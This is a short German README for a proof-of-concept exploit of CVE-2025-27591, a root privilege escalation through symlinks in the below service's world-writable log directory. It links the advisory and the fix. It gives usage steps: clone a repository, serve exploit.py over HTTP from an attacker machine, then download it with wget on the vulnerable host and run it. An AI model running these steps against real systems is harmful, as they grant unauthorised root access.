
CVE-2025-27591 ist eine Privilegienausweitungsschwachstelle, die den Below-Dienst vor Version 0.9.0 betraf.
CVE-2025-27591 ist eine Privilegienausweitungsschwachstelle, die den Below-Dienst vor Version 0.9.0 betraf. Das Problem entstand durch die Erstellung eines weltweit beschreibbaren Verzeichnisses unter /var/log/below. Ein Angreifer könnte diese Schwachstelle ausnutzen, indem er Symlinks in diesem Verzeichnis manipuliert und möglicherweise Root-Rechte erlangt, was es zu einem erheblichen Sicherheitsproblem für lokale unprivilegierte Benutzer macht.
Dieses Proof-of-Concept wurde nur zu Bildungs- und Forschungszwecken geschrieben.
Zum Zeitpunkt des Verfassens gab es in der Community keinen öffentlich verfügbaren PoC für diese Schwachstelle.Daher entschied ich mich, diese Implementierung verantwortungsvoll zu teilen, um diese Lücke zu schließen, zum Sicherheitsforschungs-Ökosystem beizutragen und das Bewusstsein für die kritische Natur unsicherer Dateisysteme zu schärfen.
Vom Angreiferrechner aus:
1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git
2-cd CVE-2025-27591-PoC
3-python3 -m http.server 80
Vom anfälligen System aus:
1- wget http:///exploit.py
2-python exploit.py
https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3